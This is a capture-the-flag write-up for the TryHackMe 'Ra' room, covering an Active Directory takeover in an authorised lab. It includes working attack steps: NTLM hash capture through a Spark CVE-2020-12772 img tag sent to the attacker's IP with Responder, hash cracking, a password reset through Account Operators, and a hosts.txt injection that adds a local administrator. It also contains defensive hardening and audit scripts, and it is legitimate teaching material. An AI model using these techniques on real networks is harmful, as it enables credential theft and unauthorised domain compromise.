URL: https://dev.to/exploitnotes/tryhackme-ra-windcorp-writeup-3eh0

TryHackMe - Ra (WindCorp) Writeup - DEV Community


Room: Ra | Difficulty: Hard | OS: Windows Server 2019 (Active Directory)
Flags Captured: 3/3 | Topics: OSINT, SMB, Spark CVE-2020-12772, NTLM Relay, Account Operator Abuse, Scheduled Task Exploitation


Overview

WindCorp is a fictional multibillion-dollar company boasting they're "unhackable." This room walks us through a full Active Directory compromise from a web-based OSINT trick to owning the domain Administrator account, with a creative scheduled task abuse along the way.


Reconnaissance

Nmap

nmap -sCV -A 10.48.138.89 -oA nmap-Ra

Key open ports:

Port Service
53 DNS
80 HTTP (Microsoft IIS 10.0)
88 Kerberos
389 LDAP (Domain: windcorp.thm)
445 SMB
636 LDAPS

This is clearly a Windows Active Directory Domain Controller. Domain: windcorp.thm, hostname: FIRE.


Step 1 - Web OSINT and Password Reset

The Web Portal

Visiting http://10.48.138.89/ reveals a company portal for Wind Corporation with a Reset Password button, an "employees in focus" section showing Emily Jensen, Lily Levesque, and Kirk Uglas, and an IT support staff list.

The reset page is at http://fire.windcorp.thm/reset.asp. It asks for a username and a security question (mother's maiden name / pet name / first car / first grade teacher).

Directory Enumeration

feroxbuster -u http://windcorp.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
 -d 3 -x php,asp,py,txt,html -C 403,404

Key discovery - the image filename gave it away:

http://windcorp.thm/img/lilyleAndSparky.jpg

Lily Levesque's profile photo is named lilyleAndSparky.jpg - her pet's name is Sparky.

Resetting Lily's Password

  • Username: lilyle
  • Security question: What is your favourite pet's name?
  • Answer: Sparky

Result:

Your password has been reset to: [REDACTED]

Step 2 - SMB Enumeration

Validate credentials and enumerate shares:

nxc smb 10.48.138.89 -u 'lilyle' -p '[REDACTED]'
nxc smb 10.48.138.89 -u 'lilyle' -p '[REDACTED]' --shares

Readable shares:

Share Access
IPC$ READ
NETLOGON READ
Shared READ
SYSVOL READ
Users READ

Exploring the Shared Share

smbclient //windcorp.thm/Shared -U 'lilyle%[REDACTED]'
smb: \> ls
Flag 1.txt A 45
spark_2_8_3.deb A 29526628
spark_2_8_3.dmg A 99555201
spark_2_8_3.exe A 78765568
spark_2_8_3.tar.gz A 123216290
smb: \> mget *

Flag 1

THM{[REDACTED]}

The presence of Spark IM installer files is the next major hint.


Step 3 - Spark IM and CVE-2020-12772

Spark is an open-source XMPP instant messaging client. Version 2.8.3 is vulnerable to CVE-2020-12772.

The Vulnerability

When a user sends an img tag with an external URL to another Spark user, the recipient's client automatically pre-renders the image, triggering an outbound HTTP request with their NTLM credentials to the attacker's server.

Reference: https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md

Installing Spark on Kali

sudo dpkg -i --ignore-depends=openjdk-8-jre,oracle-java8-jre spark_2_8_3.deb

Fix the Java launch script for modern JDK compatibility:

sudo nano /usr/bin/spark

Add these flags to the java launch command:

java \
 --add-opens java.base/java.net=ALL-UNNAMED \
 --add-opens java.base/java.lang=ALL-UNNAMED \
 --add-opens java.base/java.util=ALL-UNNAMED \
 -Dappdir=${wd} \
 ${javalibrarypath} \
 -cp ${classpath} \
 ${mainclass}

Login to Spark

  • Username: lilyle
  • Password: [REDACTED]
  • Domain: windcorp.thm

Note: On first login you'll get a certificate error. Go to Advanced, then the General tab, and check "Accept all certificates (self-signed/expired/not trusted)" and "Disable certificate hostname verification".

Capturing NTLM Hashes

Start Responder on your tun0 interface:

sudo responder -I tun0

From the web portal's IT staff list, the user Buse Candan has a green/active icon - try them first. In Spark, open a chat with buse@fire.windcorp.thm and send:

Hey!! <img src=http://<YOUR-TUN0-IP>/a.png>

Responder captures:

[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:6675ccda3142b25a:3E9EC46D91ECC55692AFE6912F41E08B:...

Cracking the Hash

echo 'buse::WINDCORP:<full_hash_here>' > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Cracked password: [REDACTED]


Step 4 - WinRM Shell as Buse

nxc smb 10.48.138.89 -u 'buse' -p '[REDACTED]'
evil-winrm -i 10.48.138.89 -u 'buse' -p '[REDACTED]'

Flag 2

*Evil-WinRM* PS C:\Users\buse\Desktop> type "Flag 2.txt"
THM{[REDACTED]}

Step 5 - Privilege Escalation via Account Operator Abuse

Buse's Group Memberships

whoami /all

Key finding:

BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled

Account Operators can modify user accounts including resetting passwords for non-protected accounts. This is a classic privilege escalation path.

The Scheduled Task Goldmine

C:\> dir
# Interesting: C:\scripts\
C:\scripts> type log.txt
Last run: 06/03/2026 23:35:39
C:\scripts> type checkservers.ps1

The script checkservers.ps1 runs every 45 seconds, reads C:\Users\brittanycr\hosts.txt, builds a Test-Connection command from each line and executes it with Invoke-Expression. Because the file content is evaluated as PowerShell, anyone who can write hosts.txt gets command injection under the task's account. brittanycr is a non-admin user, so buse, as an Account Operator, can reset their password.
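The fix for this pattern is to never let file content reach Invoke-Expression: validate each line against a strict hostname/IP allowlist and pass it to Test-Connection as a parameter. The script below is an added example written for this writeup, not the room's checkservers.ps1; the file paths, the log format and the choice to refuse inputs that non-privileged principals can write are all assumptions.

```powershell
# Added example (not the room's script): a hardened replacement for the
# checkservers.ps1 pattern. Paths and log format are assumptions.
$HostsFile = 'C:\scripts\hosts.txt'   # assumption: input lives outside any user profile
$LogFile   = 'C:\scripts\log.txt'

# Allow only RFC 1123 hostnames/FQDNs or dotted-quad IPv4 addresses. Anything
# else (';', '|', '$(', spaces, quotes) is rejected, so no line can become code.
$HostPattern = '^(?=.{1,253}$)([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
$Ipv4Pattern = '^((25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(25[0-5]|2[0-4]\d|1?\d?\d)$'

function Test-SafeHostName {
    param([string]$Name)
    return ($Name -match $HostPattern) -or ($Name -match $Ipv4Pattern)
}

function Test-InputWritableByUnprivileged {
    # True if any Allow ACE grants write rights to something other than SYSTEM/Administrators.
    param([string]$Path)
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        $id = $ace.IdentityReference.Value
        $grantsWrite = (($ace.FileSystemRights -band $writeMask) -ne 0)
        if ($ace.AccessControlType -eq 'Allow' -and $grantsWrite -and
            $id -notmatch '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators)$') {
            return $true
        }
    }
    return $false
}

function Invoke-ServerCheck {
    param([string]$Path, [string]$Log)

    # A SYSTEM task must not consume an input that lower-privileged users control.
    if (Test-InputWritableByUnprivileged -Path $Path) {
        Add-Content -Path $Log -Value "$(Get-Date -Format s) REFUSED: $Path is writable by a non-privileged principal"
        return
    }

    foreach ($line in Get-Content -LiteralPath $Path) {
        $target = $line.Trim()
        if ([string]::IsNullOrEmpty($target)) { continue }
        if (-not (Test-SafeHostName -Name $target)) {
            Add-Content -Path $Log -Value "$(Get-Date -Format s) SKIPPED invalid entry: '$target'"
            continue
        }
        # Bound as a parameter value: PowerShell never parses $target as code.
        $up = Test-Connection -ComputerName $target -Count 1 -Quiet -ErrorAction SilentlyContinue
        $state = if ($up) { 'up' } else { 'down' }
        Add-Content -Path $Log -Value "$(Get-Date -Format s) $target is $state"
    }
}

Invoke-ServerCheck -Path $HostsFile -Log $LogFile
```

Fed the payload from this room (a line starting with `;` followed by net user commands), the hardened script logs a SKIPPED entry and moves on; fed a file sitting in a user's profile, it refuses to run at all, because the directory's inherited ACL gives that user write access. The ACL check covers the file itself; if the containing directory is also user-writable the file can be deleted and recreated, so the directory should be locked down as well.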

Reset brittanycr's Password

net user brittanycr "Hacked@123" /domain

Access brittanycr's SMB Share

smbclient //windcorp.thm/Users -U 'brittanycr%Hacked@123'
smb: \> cd brittanycr\
smb: \brittanycr\> get hosts.txt

Inject the Payload

Craft a malicious hosts.txt that creates a new local administrator:

echo '; net user newuser Password@123 /add; net localgroup Administrators newuser /add' > hosts.txt

Upload it back:

smb: \brittanycr\> put hosts.txt

Wait 45-60 seconds for the scheduled task to execute.


Step 6 - Administrator Shell and Flag 3

evil-winrm -i 10.48.138.89 -u 'newuser' -p 'Password@123'

Verify group membership:

whoami /groups
# BUILTIN\Administrators - confirmed

Flag 3

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type Flag3.txt
THM{[REDACTED]}

Flags Summary

Flag Value
Flag 1 THM{[REDACTED]}
Flag 2 THM{[REDACTED]}
Flag 3 THM{[REDACTED]}

Key Takeaways

  1. Image filenames leak OSINT - lilyleAndSparky.jpg revealed the pet's name for a password reset.
  2. CVE-2020-12772 (Spark IM) - Never deploy IM clients that auto-render external images without sandboxing; it enables trivial NTLM hash capture.
  3. Account Operators is dangerous - This AD group is often overlooked but allows modifying most user accounts, including password resets.
  4. Scripts reading user-controlled files are RCE - The checkservers.ps1 pattern (reading a file and passing its content to Invoke-Expression) is a critical design flaw.
  5. Scheduled tasks running as SYSTEM with writable inputs equals privilege escalation - Always review what scheduled tasks consume and whether lower-privileged users can influence those inputs.
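Takeaways 3 and 5 are both things a domain admin can audit in a few lines. The script below is an added example for this writeup, not the room's or any project's code: one function lists Account Operators membership (the group should normally be empty) and how many accounts are left unprotected by adminCount, the other walks scheduled tasks running as SYSTEM, collects every path the task executable, its arguments or a referenced .ps1 mention, and reports files that a non-privileged principal can write. It assumes the RSAT ActiveDirectory module and the built-in ScheduledTasks module are available on the host where it runs; the path regex is a heuristic, not a parser.

```powershell
# Added example (not from the room): audit helpers for Account Operators
# membership and for SYSTEM scheduled tasks with user-writable inputs.
# Assumes the ActiveDirectory (RSAT) and ScheduledTasks modules are present.
Import-Module ActiveDirectory

function Get-AccountOperatorsExposure {
    # Every member of BUILTIN\Account Operators (S-1-5-32-548) can reset the
    # password of any user that AdminSDHolder does not protect (adminCount <> 1).
    $members = @(Get-ADGroupMember -Identity 'Account Operators' -Recursive)
    $unprotected = @(Get-ADUser -Filter 'enabled -eq $true' -Properties adminCount |
        Where-Object { $_.adminCount -ne 1 })
    [pscustomobject]@{
        AccountOperators   = ($members | ForEach-Object { "$($_.objectClass):$($_.SamAccountName)" })
        MemberCount        = $members.Count
        ResettableAccounts = $unprotected.Count   # accounts a member could take over
    }
}

function Get-SystemTaskWritableInputs {
    param(
        [string[]]$PrivilegedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
    )
    $pathRegex = '[A-Za-z]:\\[^\s"'']+'   # heuristic: Windows drive paths up to whitespace/quote
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'
    $findings  = @()

    $systemTasks = Get-ScheduledTask | Where-Object {
        $_.Principal.UserId -match '^(NT AUTHORITY\\)?SYSTEM$|^S-1-5-18$'
    }
    foreach ($task in $systemTasks) {
        foreach ($action in $task.Actions) {
            $candidates = @()
            if ($action.Execute) { $candidates += [Environment]::ExpandEnvironmentVariables($action.Execute) }
            foreach ($m in [regex]::Matches([string]$action.Arguments, $pathRegex)) { $candidates += $m.Value }
            # Follow one level into scripts: the file a .ps1 reads (hosts.txt here) is also an input.
            foreach ($c in @($candidates)) {
                if ($c -like '*.ps1' -and (Test-Path -LiteralPath $c)) {
                    $body = Get-Content -LiteralPath $c -Raw
                    foreach ($m in [regex]::Matches($body, $pathRegex)) { $candidates += $m.Value }
                }
            }
            foreach ($path in ($candidates | Sort-Object -Unique)) {
                if (-not (Test-Path -LiteralPath $path)) { continue }
                foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
                    $id = $ace.IdentityReference.Value
                    $grantsWrite = (($ace.FileSystemRights -band $writeMask) -ne 0)
                    if ($ace.AccessControlType -eq 'Allow' -and $grantsWrite -and ($PrivilegedPrincipals -notcontains $id)) {
                        $findings += [pscustomobject]@{
                            Task       = $task.TaskName
                            RunsAs     = $task.Principal.UserId
                            File       = $path
                            WritableBy = $id
                            Rights     = $ace.FileSystemRights
                        }
                    }
                }
            }
        }
    }
    return $findings
}

Get-AccountOperatorsExposure | Format-List
Get-SystemTaskWritableInputs | Format-Table -AutoSize
```

Run on a host like FIRE, the first function would be expected to list buse under AccountOperators, and the second to flag C:\Users\brittanycr\hosts.txt as writable by brittanycr through the task that runs C:\scripts\checkservers.ps1, which is exactly the chain this room uses. Any row in the second table is a SYSTEM task whose behaviour a lower-privileged user can influence and deserves the same review the writeup gives checkservers.ps1.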

Tools Used

Tool Purpose
nmap Port/service scanning
feroxbuster Web directory enumeration
nxc (NetExec) SMB enumeration and credential validation
smbclient SMB file access
bloodhound-python AD enumeration
BloodHound AD attack path visualization
Spark 2.8.3 XMPP client (exploit delivery)
Responder NTLM hash capture
john Hash cracking
evil-winrm WinRM shell

Written as a learning resource. All activities were performed in an authorized TryHackMe lab environment.